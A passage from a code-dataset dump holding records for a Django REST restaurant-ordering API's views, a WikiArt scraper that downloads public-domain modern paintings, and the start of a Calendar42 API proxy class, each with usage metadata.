status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass TipRestavracijeViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n serializer_class = TipRestavracijeSerializer\n queryset = TipRestavracije.objects.all()\n model = TipRestavracije\n\n\nclass AdminUporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = AdminUporabnikSerializer\n queryset = AdminUporabnik.objects.all()\n model = AdminUporabnik\n\n @action(detail=False, methods=['POST'])\n def login(self, request):\n \"\"\"\n The function receives JSON data with the email and the password. If the user exist and the password is\n correct we return the id of the restaurant the user manages, if he does not manage any restaurant returns None.\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n id_restavracija: If status 1, id of restaurant or None\n \"\"\"\n response = {}\n\n # First try to get the user\n try:\n user = AdminUporabnik.objects.get(email=request.data['email'])\n except AdminUporabnik.DoesNotExist:\n user = None\n\n # if user exist check password\n if user is not None:\n password = request.data['password']\n match = check_password(password, user.password)\n if not match:\n response['status'] = 0\n response['description'] = \"Password does not match\"\n return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n else:\n query = Restavracija.objects.all().filter(id_admin=user.id)\n data = RestavracijaSerializer(query, many=True).data\n\n if len(data) != 0:\n id_restavracija = data[0]['id_restavracija']\n else:\n id_restavracija = None\n\n response['status'] = 1\n response['description'] = \"Username and password match\"\n response['id_restavracija'] = id_restavracija\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = \"Username does not exist\"\n return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the email and the password.\n If the input data is valid it creates a new admin user.\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n \"\"\"\n serializer = AdminUporabnikSerializer(data=request.data)\n response = {}\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"New user created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n email_error = (\"Email - \" + serializer.errors['email'][0]) if 'email' in serializer.errors else \"\"\n password_error = (\n \"Password - \" + serializer.errors['password'][0]) if 'password' in serializer.errors else \"\"\n\n response['status'] = 0\n response['description'] = \"Error: \" + email_error + password_error\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = UporabnikSerializer\n queryset = Uporabnik.objects.all()\n model = Uporabnik\n\n @action(detail=False, methods=['POST'])\n def get_orders(self, request):\n \"\"\"\n Return all orders and meal data for given user\n \"\"\"\n response = {}\n try:\n id_uporabnik = request.data['id_uporabnik']\n except KeyError:\n id_uporabnik = None\n\n try:\n limit = int(request.data['num_orders'])\n except KeyError:\n limit = 10\n\n if id_uporabnik is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the user id\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response['status'] = 1\n response['description'] = \"Orders for user: \" + id_uporabnik + \"\"\n response['orders'] = get_orders(id_uporabnik, limit)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the token of the new user.\n If the input data is valid it creates a new user.\n Return values\n status: 0 - Error, 1 - New user created, 2 - User already registered\n description: Short description of Error or confirm desired action\n \"\"\"\n try:\n user = Uporabnik.objects.get(id_uporabnik=request.data['id_uporabnik'])\n except Uporabnik.DoesNotExist:\n user = None\n\n response = {}\n if user is None:\n serializer = UporabnikSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"New user created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n id_error = \"ID: \" + serializer.errors['id_uporabnik'][0]\n response['status'] = 0\n response['description'] = \"Error: \" + id_error\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response['status'] = 2\n response['description'] = \"User already registered\"\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def check_in(self, request):\n # TODO: Implement check in from user\n response = {}\n try:\n id_narocila = request.data['id_narocilo']\n qr = request.data['qr']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Error: Missing either id_narocilo or qr\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # noinspection PyBroadException\n try:\n order = Narocilo.objects.get(id_narocila=id_narocila)\n order_id_restaurant = order.id_restavracija\n except Exception:\n response['status'] = 0\n response['description'] = \"Could not retrieve order {}\".format(id_narocila)\n return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n try:\n Mize.objects.get(id_restavracija=order_id_restaurant, id_miza=qr)\n except models.ObjectDoesNotExist:\n response['status'] = 0\n response['description'] = \"Error: Restaurant ID and QR do not match for provided Order\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = model_to_dict(order)\n data[\"checked_in\"] = True\n data[\"id_miza\"] = qr\n\n serializer = NarociloSerializer(data=data, instance=order)\n if serializer.is_valid():\n serializer.save()\n # Add order to checked_in array to be used in refresh api call\n order_dict = {'id_narocila': order.id_narocila, 'qr': qr,\n 'id_restavracija': order.id_restavracija.id_restavracija}\n add_checked_in_order(order_dict)\n\n response['status'] = 1\n response['description'] = \"Successfully checked in order\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass JedViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = JedSerializer\n queryset = Jed.objects.all()\n model = Jed\n\n def list(self, request, *args, **kwargs):\n return_data = defaultdict(list)\n get_params = request.query_params\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response = {\n 'status': 0,\n 'description': \"Missing id, add ?id_restavracija=x to call\"\n }\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n meal_types = JedilniList.objects.all()\n meal_types = JedilniListSerializer(meal_types, many=True).data\n meal_types = {x['id_jedilni_list']: x['vrsta'] for x in meal_types} # Transform OrderDict to dict\n\n meals = Jed.objects.filter(id_restavracija=id_restavracija)\n meals = JedSerializer(meals, many=True).data\n\n for meal in meals:\n typ = meal_types[meal['id_jedilni_list']]\n return_data[typ].append({\n 'id_jed': meal['id_jed'],\n 'ime_jedi': meal['ime_jedi'],\n 'opis_jedi': meal['opis_jedi'],\n 'cena': meal['cena'],\n 'kolicina': 1\n })\n\n return Response(return_data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def new_meal(self, request):\n \"\"\"\n Create new meal\n \"\"\"\n serializer = JedSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n response = {'status': 1, 'description': \"New meal created\"}\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response = {'status': 0, 'description': \"Could not create meal\"}\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n", "sub_path": "ServeUp/Views/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 25251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 71, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 71, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 88, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 88, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 88, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 95, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 95, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 95, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 105, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 111, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 125, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 125, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 136, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 136, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 151, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 151, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 151, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 156, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 156, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 156, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 168, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 168, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 168, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 176, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 176, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 176, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 180, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 180, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 180, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 127, "usage_type": "call"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 187, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 193, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 193, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 193, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 200, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 200, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 200, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 204, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 204, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 204, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 182, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 207, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 207, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 237, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 237, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 237, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 240, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 240, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 240, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 217, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 283, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 283, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 283, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 293, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 293, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 293, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 307, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 307, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 311, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 311, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 311, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 242, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 332, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 332, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 332, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 344, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 344, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 344, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 313, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 357, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 357, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 357, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 362, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 362, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 362, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 374, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 374, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 374, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 378, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 378, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 378, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 346, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 381, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 381, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 393, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 393, "usage_type": "name"}, {"api_name": "django.contrib.auth.hashers.check_password", "line_number": 419, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 423, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 423, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 423, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 436, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 436, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 436, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 440, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 440, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 440, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 398, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 457, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 457, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 457, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 465, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 465, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 442, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 492, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 492, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 492, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 497, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 497, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 497, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 473, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 520, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 520, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 520, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 525, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 525, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 525, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 529, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 529, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 529, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 499, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 541, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 541, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 541, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 550, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 550, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 550, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 557, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 557, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 557, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 559, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 573, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 573, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 573, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 577, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 577, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 577, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 531, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 596, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 596, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 596, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 615, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 615, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 615, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 626, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 626, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 626, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 629, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 629, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 629, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 617, "usage_type": "call"}]}
+{"seq_id": "74423526", "text": "import urllib\nimport urllib.request\nimport re\nfrom bs4 import BeautifulSoup\nimport time\nimport os\n\nfile_path = \"modern_paintings\"\nos.makedirs(file_path, exist_ok=True)\n\ndef url_open(url):\n req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlopen(req,timeout=50).read()\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\n return BeautifulSoup(s, \"lxml\")\n\ndef urlretrieve(image_url, save_path):\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlretrieve(image_url, save_path)\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\ndef get_images(url):\n print(url)\n genre_soup = url_open(url)\n artist_list_main = genre_soup.find(\"main\")\n lis = artist_list_main.find_all(\"li\")\n\n # for each list element\n for li in lis: \n born = 0\n died = 0\n\n # get the date range\n for line in li.text.splitlines():\n if line.startswith(\",\") and \"-\" in line:\n parts = line.split('-')\n if len(parts) == 2:\n born = int(re.sub(\"[^0-9]\", \"\",parts[0]))\n died = int(re.sub(\"[^0-9]\", \"\",parts[1]))\n\n # look for artists who may have created work that could in public domain\n if born>1800 and died>0 and died<1978:\n link = li.find(\"a\")\n artist = link.attrs[\"href\"]\n\n # get the artist's main page\n artist_url = base_url + artist\n artist_soup = url_open(artist_url)\n\n # only look for artists with the word modern on their main page\n if \"modern\" in artist_soup.text.lower():\n print(artist + \" \" + str(born) + \" - \" + str(died))\n\n # get the artist's web page for the artwork\n url = base_url + artist + '/all-works/text-list'\n artist_work_soup = url_open(url)\n\n # get the main section\n artist_main = artist_work_soup.find(\"main\")\n image_count = 0\n artist_name = artist.split(\"/\")[2]\n os.makedirs(file_path + \"/\" + artist_name, exist_ok=True)\n\n # get the list of artwork\n lis = artist_main.find_all(\"li\")\n\n # for each list element\n for li in lis:\n link = li.find(\"a\")\n\n if link != None:\n painting = link.attrs[\"href\"]\n\n # get the painting\n url = base_url + painting\n print(url)\n\n try:\n painting_soup = url_open(url)\n\n except:\n print(\"error retreiving page\")\n continue\n\n # check the copyright\n if \"Public domain\" in painting_soup.text:\n\n # get the url\n og_image = painting_soup.find(\"meta\", {\"property\":\"og:image\"})\n image_url = og_image[\"content\"].split(\"!\")[0] # ignore the !Large.jpg at the end\n print(image_url)\n\n parts = url.split(\"/\")\n painting_name = parts[-1]\n save_path = file_path + \"/\" + artist_name + \"/\" + painting_name + \".jpg\"\n\n #download the file\n try:\n print(\"downloading to \" + save_path)\n time.sleep(0.2) # try not to get a 403 \n urlretrieve(image_url, save_path)\n image_count = image_count + 1\n except Exception as e:\n print(\"failed downloading \" + image_url, e)\n\nbase_url = \"https://www.wikiart.org\"\nurls = []\nfor c in range(ord('a'), ord('z') + 1):\n char = chr(c)\n artist_list_url = base_url + \"/en/Alphabet/\" + char + \"/text-list\"\n urls.append(artist_list_url)\n\nprint(urls)\n\nfrom concurrent.futures import ThreadPoolExecutor\nexecutor = None\nwith ThreadPoolExecutor(max_workers = 16) as executor:\n ex = executor\n executor.map(get_images, urls)\n ", "sub_path": "download.py", "file_name": "download.py", "file_ext": "py", "file_size_in_byte": 3991, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 12, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 17, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 32, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 32, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 56, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 80, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "596506285", "text": "import logging\r\nimport requests\r\n\r\nfrom apiproxy import constants\r\nfrom .exceptions import LoggedDetailsAPIException\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass APIActionCaller():\r\n\t\"\"\"Abstract class which must be inherited to handle a call to a Calendar42 API action\r\n\t\r\n\tThe abstract methods to implement are:\r\n\t* extract_data()\r\n\t* get_relative_url()\r\n\t\"\"\"\r\n\t\r\n\tdef __init__(self, token):\r\n\t\t\"\"\"\r\n\t\t@param {str} token\tThe authentication token to use when calling the Calendar42 API\r\n\t\t\"\"\"\r\n\t\tself._token = token\r\n\t\r\n\tdef call(self, *args, **kwargs):\r\n\t\t\"\"\"Calls the Calendar42 API and returns the response\r\n\t\tParameters (if any) are forwarded to self.get_relative_url(), which may need some runtime data to compute the URL\r\n\t\t\r\n\t\t@return\t{dict}\tThe JSON API response\r\n\t\t\"\"\"\r\n\t\t\r\n\t\t# Call the Calendar42 API\r\n\t\tfull_url = constants.CALENDAR42_API_BASE_URL + self.get_relative_url(*args, **kwargs)\r\n\t\t\r\n\t\theaders = {\r\n\t\t\t'Accept': 'application/json',\r\n\t\t\t'Content-type': 'application/json',\r\n\t\t\t'Authorization': 'Token %s' % self._token,\r\n\t\t}\r\n\t\tresponse = requests.get(full_url, headers=headers)\r\n\t\t\r\n\t\t# Parse response as JSON\r\n\t\ttry:\r\n\t\t\tjson_data = response.json()\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the body of the response which couldn't get parsed to JSON: %s\" % (full_url, response.text))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\t\r\n\t\t# Extract desired information\r\n\t\ttry:\r\n\t\t\tif 'error' in json_data:\r\n\t\t\t\t# Forward error from Calendar42 API to client\r\n\t\t\t\traise LoggedDetailsAPIException(json_data['error']['message'])\r\n\t\t\t\t\r\n\t\t\treturn self.extract_data(json_data)\r\n\t\texcept (KeyError, ValueError, AttributeError) as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the JSON data which didn't fit the expected format: %s\" % (full_url, json_data))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef extract_data(self, json_data):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tExtracts the desired information from the JSON data returned by the Calendar42 API\r\n\t\t@param {dict} json_data\r\n\t\t@return {dict}\tThe extracted data\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef get_relative_url(self, *args, **kwargs):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tReturns the end of the URL, corresponding to the API action to call\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\r\n\r\nclass EventDetailsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets details (ID and title) of an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_EVENT.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\traw_details = json_data['data'][0]\r\n\t\tdetails = {\r\n\t\t\t'id': raw_details['id'],\r\n\t\t\t'title': raw_details['title'],\r\n\t\t}\r\n\t\treturn details\r\n\r\n\t\t\r\nclass EventParticipantsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets list of participants to an event\"\"\"\r\n\r\n\tdef get_relative_url(self, 